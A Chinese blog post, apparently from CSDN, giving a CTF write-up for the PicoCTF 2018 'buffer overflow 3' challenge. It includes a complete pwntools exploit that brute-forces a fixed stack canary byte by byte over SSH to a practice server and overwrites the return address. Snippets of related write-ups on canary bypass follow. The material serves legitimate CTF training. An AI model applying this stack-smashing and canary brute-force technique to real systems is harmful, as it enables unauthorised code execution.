PicoCTF_2018_buffer_overflow_3(本地固定canary的爆破)

最新推荐文章于 2024-01-29 00:11:44 发布
最新推荐文章于 2024-01-29 00:11:44 发布
阅读量831 收藏
点赞数 1
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/105864363
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

PicoCTF_2018_buffer_overflow_3

用IDA分析一下程序,程序从一个固定文件里读取数据,作为canary的值。

由于文件内容不变,所以,我们可以直接爆破。

#coding:utf8
from pwn import *

shell = ssh(host='node3.buuoj.cn', user='CTFMan', port=27525, password='guest')

context.log_level = 'critical'
#爆破本地canary
canary = ''
for i in range(4):
   for c in range(0xFF):
      #sh = process('./PicoCTF_2018_buffer_overflow_3')
      sh = shell.process('./vuln')
      sh.sendlineafter('>','-1')
      payload = 'a'*0x20 + canary + p8(c)
      sh.sendafter('Input>',payload)
      sh.recv(1)
      ans = sh.recv()
      #print ans
      if 'Canary Value Corrupt!' not in ans:
         print 'success guess the index({}),value({})'.format(i,c)
         canary += p8(c)
         break
      else:
         print 'try to guess  the index({}) value'.format(i)
      sh.close()
print 'canary=',canary
payload = 'a'*0x20 + canary + p32(0)*4 + p32(0x080486EB)
#sh = process('./PicoCTF_2018_buffer_overflow_3')
sh = shell.process('./vuln')
sh.sendlineafter('>','-1')
sh.sendafter('Input>',payload)

sh.interactive()

 

ha1vk
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Canary学习(爆破Canary
至臻求学,胸怀云月
01-30 3734
one-by-one 爆破Canary原理 对于Canary,虽然每次进程重启后Canary不同,但是同一个进程中的不同线程的Cannary是相同的,并且通过fork函数创建的子进程中的canary也是相同的,因为fork函数会直接拷贝父进程的内存。 最低位为0x00,之后逐次爆破,如果canary爆破不成功,则程序崩溃;爆破成功则程序进行下面的逻辑。由此可判断爆破是否成功。 我们可以利用这样的...
pwn中 one-by-one 爆破 Canary
Jonas_brown的博客
10-28 404
对于 Canary,虽然每次进程重启后的 Canary 不同 (相比 GS,GS 重启后是相同的),但是同一个进程中的不同线程的 Canary 是相同的, 并且 通过 fork 函数创建的子进程的 Canary 也是相同的,因为 fork 函数会直接拷贝父进程的内存。我们可以利用这样的特点,彻底逐个字节将 Canary 爆破出来。 在著名的 offset2libc 绕过 linux64bit 的所有保护的文章中,作者就是利用这样的方式爆破得到的 Canary: 这是爆破的 Python 代码:
canary爆破、pie保护(格式化字符串漏洞
2301_81031055的博客
01-29 348
canary两种解题方式:1.爆破canary2.如果存在字符串格式化漏洞可以输出泄露canary的地址并利用栈溢出覆盖canary的地址返回到system地址从而达到绕过。
picoctf_2018_buffer overflow 0
z1r0的博客
02-14 406
picoctf_2018_buffer overflow 0 查看保护 这里会将flag输入到flag这个全局变量里,还有一个signal信号11。表示对存储的无效访问 这里的话将flag写到stderr中。然后fflush(stdeer)刷新标准错误输出缓冲区,把输出缓冲区里的东西打印到标准输出设备上 ,也就是会打印flag。其实就是当程序造成无效内存访问的时候,就会输出flag。 接着再输入参数,放到vuln函数里 这里有一个栈溢出,因为输入的参数可以无限长,所以在执行栈溢出时,程序会造成无效内
pico ctf 2013 php3,PicoCTF_2018_buffer_overflow_3(本地固定canary爆破)
weixin_31998661的博客
03-23 148
PicoCTF_2018_buffer_overflow_3用IDA分析一下程序,程序从一个固定文件里读取数据,作为canary的值。 由于文件内容不变,所以,我们可以直接爆破。 #coding:utf8from pwn import *shell = ssh(host='node3.buuoj.cn', user='CTFMan', port=27525, password='guest')co...
HttpCanary_3.3.6.zip
04-29
安卓抓包工具,支持安卓10
HttpCanary_3.3.6.zip 工具软件安装包下载
04-27
HttpCanary_3.3.6.zip 工具软件安装包下载
67.0.3371.0_chrome64_canary_windows_installer
04-02
67.0.3371.0_chrome64_canary_windows_installer 版本号:67.0.3371.0 发布日期:2018-03-15 适用于 Windows 10/8/7/XP 64位
HttpCanary_9.9.9.9-2.zip
最新发布
02-21
HttpCanary_9.9.9.9-2.zip
HttpCanary_安卓.apk
02-14
一个可以在android手机上正常运行的抓包工具,方便抓包进行代码的调试,还可以查看手机网络请求,赶快试一试吧。
BUUCTF pwn——picoctf_2018_buffer overflow 2
CNS-Enterprise BCC-1701-J
05-20 112
BUUCTF 做题练习
BUUCTFPicoCTF_2018_buffer_overflow_1
weixin_51055545的博客
01-05 1332
先放进虚拟机中检查: 任何保护机制都没开,放到32位IDA中: 主函数很简单,进入vuln()函数看一下: 很明显有溢出,进入栈中看偏移: 这里偏移为0x28,我们思路是第一次溢出,去泄露libc地址,再次进行溢出get shell。 第一次溢出: io.recvuntil(':') payload = 'A'*0X28 payload += p32(0) payload += p32(printf) payload += p32(main) payload += p32(elf.got.
picoctf_2018_buffer overflow 2
qq_62887641的博客
09-26 116
32位,只开了NX很简单的程序栈溢出并且有后门函数后门函数需要。
Canary保护机制及绕过
二狗的博客
01-29 834
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
[BUUCTF-pwn]——picoctf_2018_buffer overflow 0
Y_peak的博客
04-28 376
[BUUCTF-pwn]——picoctf_2018_buffer overflow 0 好久不写BUU了,手都快生了赶快过来写写。 通过观察源文件发现,首先有put函数不需要去libc中找,同时argv肯定大于1,也就是需要至少两个参数,才可以到else语句,同时vuln函数的参数是第二个参数。 进入vuln函数内部看看,找到strcpy函数这个函数是一个典型的可以用来利用溢出的函数。所以我们可以在这里进行栈溢出,以此调用puts函数打印flag.因为flag在bss段上。 from pwn imp
栈溢出——cannary绕过方法详解
qq_42882717的博客
03-14 2439
cannary绕过
BUUCTFPicoCTF_2018_buffer_overflow_2
weixin_51055545的博客
01-05 899
例行检查程序: 还是32位程序,没有canary,很可能是溢出类的。 放到IDA中: 主函数没什么特别,进入vuln()函数看一下: 果然存在溢出漏洞,两次溢出,直接去get shell 第一次溢出去泄露libc地址,第二次溢出get shell 这里我选怎printf()函数作为泄露的函数,同样也可以选择puts()函数, 构造payload : io.recvuntil(':') payload = 'A'*0x6c payload += p32(0) payload += p32(
picoctf_2018_buffer_overflow_2
z1r0的博客
12-11 176
picoctf_2018_buffer_overflow_2 查看保护 有溢出,还有一个getflag函数,但是想要利用需要给两个参数,结合32位下的系统调用规则即可get flag from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27317) else:
Canary 测试无法为 /tmp/.cloudera_health_monitoring_canary_files 创建父目录。
06-10
这个问题可能是由于在创建 /tmp/.cloudera_health_monitoring_canary_files 目录之前不存在其父目录 /tmp/.cloudera_health_monitoring_canary_files 所导致的。您可以尝试手动创建 /tmp/.cloudera_health_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值